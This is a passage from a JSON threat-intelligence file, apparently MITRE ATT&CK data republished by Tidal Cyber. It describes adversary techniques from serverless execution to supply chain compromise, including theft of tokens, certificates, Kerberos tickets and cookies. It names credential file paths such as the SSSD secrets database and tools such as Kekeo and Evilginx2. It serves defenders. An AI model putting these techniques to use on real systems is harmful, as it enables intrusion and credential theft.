be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup> Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.<sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "d9edb609-2ca3-43d1-9c4d-c09a2856230f",
"value": "Serverless Execution"
},
{
"description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "03fb32fa-cdee-4e94-ae3e-16b51a10ba9c",
"value": "Server Software Component"
},
{
"description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>. In some cases, adversaries may stop or disable many or all services to render systems unusable.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.<sup>[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e27c5756-f43e-424f-af62-b21e8b304e5d",
|
||
"value": "Service Stop"
|
||
},
|
||
{
|
||
"description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.<sup>[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)]</sup><sup>[[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)]</sup><sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup>\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like `LoadLibrary` at run time.<sup>[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
                    "type": "uses"
                }
            ],
            "uuid": "8941d1f4-d80c-4aaa-821a-a059c2a0f854",
            "value": "Shared Modules"
        },
        {
            "description": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.<sup>[[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]</sup> Such services may also utilize [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698) to communicate back to adversary owned infrastructure.<sup>[[Mitiga Security Advisory: SSM Agent as Remote Access Trojan](https://app.tidalcyber.com/references/88fecbcd-a89b-536a-a1f6-6ddfb2b452da)]</sup>\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.<sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup>\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Network",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
                    "type": "uses"
                },
                {
                    "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
                    "type": "uses"
                }
            ],
            "uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058",
            "value": "Software Deployment Tools"
        },
        {
"description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).",
            "meta": {
                "platforms": [
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
                    "type": "uses"
                }
            ],
            "uuid": "e9bff6ff-3142-4910-8f67-19b868912602",
            "value": "Software Discovery"
        },
        {
            "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup>\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) when a user browses to a site.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup><sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>\n* Staging web resources for a link target to be used with spearphishing.<sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup>\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242).<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup>\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)).<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>",
            "meta": {
                "platforms": [
                    "PRE"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
                    "type": "uses"
                }
            ],
            "uuid": "ec2a76e6-3530-43e1-9e80-686e4b214ac8",
            "value": "Stage Capabilities"
        },
        {
            "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.<sup>[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]</sup> Similarly, instances within continuous integration / continuous deployment (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.<sup>[[Cider Security Top 10 CICD Security Risks](https://app.tidalcyber.com/references/512974b7-b464-52af-909a-2cb880b524e5)]</sup> If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.<sup>[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)]</sup><sup>[[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)]</sup> An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.<sup>[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)]</sup><sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.<sup>[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)]</sup> Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).<sup>[[Microsoft - Azure AD Identity Tokens - Aug 2019](https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]</sup>\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens<sup>[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)]</sup>, allowing them to obtain new access tokens without prompting the user. \n\n",
            "meta": {
                "platforms": [
                    "Azure AD",
                    "Containers",
                    "Google Workspace",
                    "Office 365",
                    "SaaS"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                }
            ],
            "uuid": "f78f2c87-626a-468f-93a5-31b61be17727",
            "value": "Steal Application Access Token"
        },
        {
            "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.<sup>[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)]</sup><sup>[[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]</sup>\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)<sup>[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)]</sup>, misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.<sup>[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)]</sup><sup>[[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)]</sup><sup>[[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)]</sup> With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup> Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>",
            "meta": {
                "platforms": [
                    "Azure AD",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                }
            ],
            "uuid": "b8c27b52-3e73-448d-8a7c-3e814c8e3889",
            "value": "Steal or Forge Authentication Certificates"
        },
        {
            "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).<sup>[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)]</sup> Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.<sup>[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]</sup>\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.<sup>[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)]</sup> On modern Red Hat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.<sup>[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)]</sup><sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup><sup>[[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]</sup>\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.<sup>[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)]</sup><sup>[[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]</sup>\n",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                }
            ],
            "uuid": "0fef0394-7cf6-4797-8a5e-1cbfd31ee501",
            "value": "Steal or Forge Kerberos Tickets"
        },
        {
            "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the target's machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>\n\nThere are several examples of malware targeting cookies from web browsers on the local system.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup> Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) by tricking victims into running malicious JavaScript in their browser.<sup>[[Talos Roblox Scam 2023](https://app.tidalcyber.com/references/9371ee4a-ac23-5acb-af3f-132ef3645392)]</sup><sup>[[Krebs Discord Bookmarks 2023](https://app.tidalcyber.com/references/1d0a21f4-9a8e-5514-894a-3d55263ff973)]</sup>\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.<sup>[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)]</sup><sup>[[GitHub Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]</sup>\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to login to the corresponding web application.",
            "meta": {
                "platforms": [
                    "Google Workspace",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                }
            ],
            "uuid": "17f9e46d-4e3d-4491-a0d9-0cc042531d6e",
            "value": "Steal Web Session Cookie"
        },
        {
"description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.<sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup> Adversaries may also create or steal code signing certificates to acquire trust on target systems.<sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup><sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> ",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "73a8b954-93fe-466c-b73d-bd35bb08c3e7",
            "value": "Subvert Trust Controls"
        },
        {
            "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)<sup>[[IBM Storwize](https://app.tidalcyber.com/references/321cf27a-327d-4824-84d0-56634d3b86f5)]</sup><sup>[[Schneider Electric USB Malware](https://app.tidalcyber.com/references/e4d8ce63-8626-4c8f-a437-b6a120ff61c7)]</sup> \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
                    "type": "uses"
                }
            ],
            "uuid": "b72c8a96-5e03-40c2-ac0c-f77b73fe493f",
            "value": "Supply Chain Compromise"
        },
        {
